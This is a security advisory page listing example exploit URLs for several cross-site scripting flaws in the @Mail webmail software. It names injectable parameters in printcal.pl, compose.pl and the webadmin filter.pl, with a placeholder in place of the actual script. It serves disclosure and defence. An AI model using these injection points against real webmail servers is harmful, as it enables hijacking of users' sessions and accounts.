• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

@Mail Multiple Cross Site Scripting Vulnerabilities

Some example exploits have been provided:

http://www.example.com/printcal.pl?year=[XSS-CODE]&month=11&type=4
http://www.example.com/printcal.pl?year=&month=11&type=4[XSS-CODE]
http://www.example.com/printcal.pl?type=4[XSS-CODE]
http://www.example.com/compose.pl?id=cur/1117452847.H104572P10795.www.example.com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]
http://www.example.com/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
http://www.example.com/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
http://www.example.com/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]
http://www.example.com/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=
http://www.example.com/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=
http://www.example.com/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]
http://www.example.com/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1
http://www.example.com/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1
http://www.example.com/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1